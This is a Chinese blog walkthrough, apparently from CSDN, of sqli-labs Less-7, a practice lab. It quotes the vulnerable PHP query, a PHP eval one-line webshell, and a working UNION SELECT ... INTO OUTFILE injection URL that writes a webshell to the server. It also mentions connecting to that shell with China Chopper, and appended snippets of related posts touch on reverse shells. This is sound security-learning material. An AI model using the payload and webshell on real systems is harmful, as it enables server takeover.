SQL注入:sqli-labs 7 文件上传漏洞

最新推荐文章于 2023-03-11 15:22:53 发布
最新推荐文章于 2023-03-11 15:22:53 发布
阅读量648 收藏
点赞数
分类专栏: 网络安全学习 文章标签: mysql php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/119647654
版权
  • 经过不断的测试,知道:sql 语句是:SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1(或者你直接代码审计(看答案))
  • 项目提示;You are in… Use outfile…,提示我们使用外部文件,所以这十有八九是一个文件上传漏洞,那如何上传?上传什么文件比较好?
  • 通过代码审计我们知道,这玩意永远都不会报错,因为被注释了:
$sql="SELECT * FROM users WHERE id=(('$id')) LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

	if($row)
	{
  	echo '<font color= "#FFFF00">';	
  	echo 'You are in.... Use outfile......';
  	echo "<br>";
  	echo "</font>";
  	}
	else 
	{
	echo '<font color= "#FFFF00">';
	echo 'You have an error in your SQL syntax';
	//print_r(mysql_error());
	echo "</font>";  
	}
}
	else { echo "Please input the ID as parameter with numeric value";}

  • 使用命令:into outfile 可以上传文件

  • 使用一句话木马:https://blog.csdn.net/ZripenYe/article/details/119189996新建一个木马文件,使用php为后缀。<?php @eval($_POST['password']);?>

  • 上传文件之前一定要检查自己my.ini配置文件中的secure-file-priv是否是等号后面没有数值,否则上传不了数据

  • 输入命令:http://127.0.0.1/sqli/Less-7/?id=1')) union select 1,"<?php @eval($_REQUEST[777]); ?>",3 into outfile "D:\\phpstudy_pro\\WWW\\sqli\\Less-7\\2.php" --++++++将文件上传到目录

  • 之后用中国菜刀等工具来访问页面(详情见博客)https://blog.csdn.net/ZripenYe/article/details/119189996

  • 另外,读取文件的操作是load_file() 函数

Zeker62
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
sqli-labs 7关(文件上传)
qq_42266432的博客
08-15 260
加单引号返回错误,id存在注入点 注入多次后,确认注入是’)) 然后使用order by猜出列数为3后,根据页面提示,使用outfile函数,此时为root权限的话,写入一句话还需获得绝对路径,能力有限,失败多次后只能去前面几关取,希望日后有机会补上 获取到了数据库的安装路径后就开始尝试注入了 使用数据库安装路径发现并未成功写入,一阵捣鼓过后,发现my.ini文件中 secure_file_priv变量的值并不是数据库路径,这个变量是控制写入权限的 修改路径后,成功将一句话写入,现在可以用中国.
mysql文件上传漏洞_文件上传漏洞
weixin_34061121的博客
01-28 199
文件上传漏洞是web安全中经常利用到的一种漏洞形式。一些web应用程序中允许上传图片,文本或者其他资源到指定的位置,文件上传漏洞就是利用这些可以上传的地方将恶意代码植入到服务器中,再通过url去访问以执行代码。0x01文件上传校验姿势(1)客户端javascript校验(一般只校验后缀名)(2)服务端校验文件头content-type字段校验(image/gif)文件内容头校验(GIF89a)后缀...
文件上传漏洞——sqli-labs第7关
这是笔者初学时所做的笔记,有错误的地方太多了,有些结论也只是笔者的一家之言。请自行判断
07-28 2655
条件: 1.已知对应站点的绝对路径 2.File_priv开关需要是打开状态 select file_priv from mysql.user; 3.secure_file_priv 不为null 设置为空,对所有路径均可进行导入导出。 设置为一个目录名字,只允许在该路径下导入导出。 设置为Null,禁止所有导入导出。 默认是NULL,可以通过my.conf文件mysqld一栏里进行配置,配置完成后,重启便会生效。 在末尾加上:secure_file_priv= select @@gl
cengbox靶机(SQL注入文件上传漏洞
m0_66299232的博客
11-23 554
将python -c 后面的利用即可因为md5check.py文件本身就是python脚本。4.抓包后看到提示,让上传一个后缀为ceng的文件,那就把木马改成weiqin.ceng。用SHELL=bash script -q /dev/null 回弹 ,还是上传我们的php-reverse-shell.php 文件,7.开启监听成功反弹shell 发现是root 成功拿下!2.发现‘or 1=1--' 可以注入成功 并且登录进去。7.回弹shell成功,发现是一个普通用户。SQL注入文件上传漏洞
SQL注入——文件上传
heyingcheng的博客
03-11 2354
3,into outfile命令使用的环境:必须知道一个,服务器上可以写入文件的文件夹的完整路径。2,数据库的file权限规定了数据库用户是否有权限,向操作系统内写入和读取已存在的权限。在这里也可以用whoami看到小皮的权限,我给的是普通用户的权限,不是管理员权限。其实我们最终的目的是往目标靶场上上传一句话木马,或者是自己想上传的php文件。当然在试的过程中可能会出现一些碰巧的情况,比如用”试得到的是一样的结果。两种结果不一样,“错的就是错的“,所以我们找到了正确的闭合方式。
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs-php7-master.zip" 暗示这是一个关于SQL注入SQL Injection)练习平台的源代码库,专为PHP7优化。在描述中提到,用户在尝试创建数据库连接时遇到问题,可能是因为原始的SQL注入实验室...
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs》是一本深入探讨SQL注入技术的专业资料,结合了sqli-labs实战平台,旨在帮助读者强化对SQL注入的理解和防御能力。SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码...
sqli-labs(php7.3以上可运行)
01-29
sqli-labs中,你可以扮演黑客的角色,尝试找出并利用SQL注入漏洞,这有助于提升你的安全意识和测试技能。渗透测试工具如Burp Suite、Sqlmap等,可以辅助进行自动化扫描和漏洞利用。 五、漏洞环境 sqli-labs提供了...
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs.rar
12-22
sqli-labs提供了多个级别的挑战,从基础的错误注入到更复杂的盲注、时间基注入、联合查询等,每个级别都设计了特定的漏洞,让学习者逐步掌握SQL注入的原理和防御方法。 学习过程中,你需要理解以下概念: - SQL语法...
利用SQL注入漏洞拖库
12-25
利用SQL注入漏洞拖库 - 利用 SQL 注入漏洞拖库的方法 1 建立数据库和表 建立数据库 lab。 在 lab 数据库创建一张表 article
ctfshow web224 sql_文件上传产生sql注入 详解
weixin_48083470的博客
10-04 2417
sql_文件上传产生注入 首先是扫描 或者 直觉检查 有个robots.txt 访问这个页面 发现可以重置密码,重置后admin登录,是个文件上传 测试下来不是文件上传漏洞,题目也是提示的sql 我这里建了个bmp的文件可以成功上传 上传后发现 有两个参数 filename 和 filetype filename 会被重命名 filetype 应该就是不动 这两个应该是会存入数据库,产生注入 那么就是insert,那么就考了堆叠注入 思路到这就没了 改变http报文是改不了filetype的 应该是
DoraBox sql注入&文件上传
B_roin的博客
03-09 388
SQL注入 1.sqli数字型 :判断是否存在注入点,执行1 and 1=1,有回显,再执行1 and 1=2发现回显不同,判断存在注入点 :判断字段数,执行1 order by 3以及执行1 order by 4时报错,判断字段数为3 :判断具体回显位,执行-1 union select 1,2,3 :获取数据库名和当前用户名,执行-1 union select 1,database(),...
CTF的sql注入、文件包含、文件上传突破等五道题
hclimg的博客
12-28 3277
使用win7建立一个ctf的环境,在本地测试实验 新手练习,在网上找了很多的资料   1、sql注入     http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=1%%27)--+ http://192.168.232.128/test/0x1oa/vulnerabilities/fu1.php?id=1%%27)or...
sqli-lab注入七
chuxuezheerer的博客
10-06 246
Less-7 GET - Dump into outfile - String (导出文件GET字符型注入) 这道题 利用文件导入时还要注意对数据库进行权限测试:正确回显 http://127.0.0.1/sqli-labs-master/Less-7/?id=1')) and (select count(*) from mysql.user)>0 --+ 之后进行into outfil...
SQLi-LABS-7
qq_44466110的博客
03-21 665
SQLi-LABS Less-7 Dump Into Outfile 看见这个标题先补充关于MySQL对于文件操作的两个函数 into outfile ​ select … into outfile ‘文件路径/文件名’; ​ select * into outfile语句把表数据导出到一个文本文件中,并用load data … file语句恢复数据。但是这种方法只能导出或导入数据的内容,不包括表...
通过sqli-labs-master第二关完成木马上传
快递小哥的博客
01-08 412
写入一句话木马条件 一.写权限 写文件 Into Outfile into Dumpfile 二.需要知道网站绝对路径 如何确定网站绝对路径 @@basedir @@datadir 1.判断注入漏洞,是数值型注入 2.判断显示位之后,...
sqli-labs7
qq_38989921的博客
11-27 433
sqli-labs7 7: 带双括号的单引号注入: 1-6关是返回报错信息的,我们首先挑选一关进行报错注入,获取网站的绝对路径,@@datadir获取数据库存储数据路径,@@basedir是MYSQL获取安装路径: 在实际中获取网站的绝对路径是很困难的。 读写权限测试: MySQL是通过权限表来控制用户对数据库访问的,权限表存放在mysql数据库中,主要的权限表有以下几个:user,db,host,table_priv,columns_priv和procs_priv。 返回正常,有读取权限。 localho
SQL-labs练习记录(7~10)【文件上传,布尔,时间注入】
bin789456的博客
06-17 288
SQL-labs练习记录(7~9)【文件上传】 Less 7 这道题显然前面的都不奏效了,报错被替换成统一信息,无法获得信息提示,更不能报错注入。 当使用 ?id=1 and 1=2 时页面正常,仅能知道不是整形注入,但也不能确定是字符注入。 确定闭合方式时,单引号频繁报错 双引号的闭合貌似没有问题 但是又没有回显。 这里就要开始提到文件上传了,数据库的file权限规定了数据库用户是否有权限向操作系统内写入和读取已存在的数据 into outfile命令使用的环境: 服务器上写入一个文件的文件夹的完整路径
sqlilabs靶场搭建
08-31
你可以按照以下步骤搭建Sqlilabs靶场: 1. 首先,需要安装一个基于Apache服务器和MySQL数据库的Web应用程序环境。你可以使用XAMPP或者WAMP等集成环境,也可以自行安装Apache、MySQLPHP。 2. 下载Sqlilabs的代码。你可以从GitHub上找到Sqlilabs的代码仓库,并将其下载到本地。 3. 将Sqlilabs的代码文件解压缩到你的Web服务器的根目录下,例如htdocs文件夹。 4. 创建数据库。打开MySQL管理工具(如phpMyAdmin),创建一个新的数据库,并为其分配一个用户名和密码。 5. 导入数据库。在MySQL管理工具中选择导入选项,选择Sqlilabs提供的SQL脚本文件,将其导入到刚刚创建的数据库中。 6. 配置Sqlilabs。进入Sqlilabs代码文件夹中,找到config目录下的db.php文件,使用文本编辑器打开该文件。 7. 在db.php文件中,修改数据库连接信息,包括主机名、用户名、密码和数据库名称,确保与之前创建的数据库相匹配。 8. 保存并关闭db.php文件。 9. 启动Web服务器。启动你的Web服务器,并确保可以通过浏览器访问Sqlilabs的主页。 10. 访问Sqlilabs。在浏览器中输入你的Web服务器地址,加上Sqlilabs的文件夹路径,即可访问Sqlilabs的主页。 现在,你已经成功搭建了Sqlilabs靶场,可以开始学习和实践SQL注入攻击了。请注意,在进行任何实验之前,请确保已经了解相关法律法规,并且仅在合法授权的环境中进行测试。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值